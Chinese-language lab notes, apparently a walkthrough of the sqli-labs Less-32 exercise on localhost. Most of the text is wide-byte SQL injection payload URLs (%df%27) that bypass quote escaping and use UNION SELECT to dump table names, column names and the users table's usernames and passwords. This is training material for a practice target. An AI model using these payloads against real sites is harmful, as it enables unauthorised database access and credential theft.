寬字節注入的常見過濾函數
2.寬字節注入的條件
3.確定寬字節注入點
http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27
http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27-- +
確定字符段
http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27 order by 3-- +
確定數據庫輸出的地方
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,2,3-- +
爆出數據庫
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,database(),3-- +
查出表名
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
爆出列名
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+
爆出用戶名密碼
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(username,0x7e,password) from users),3--+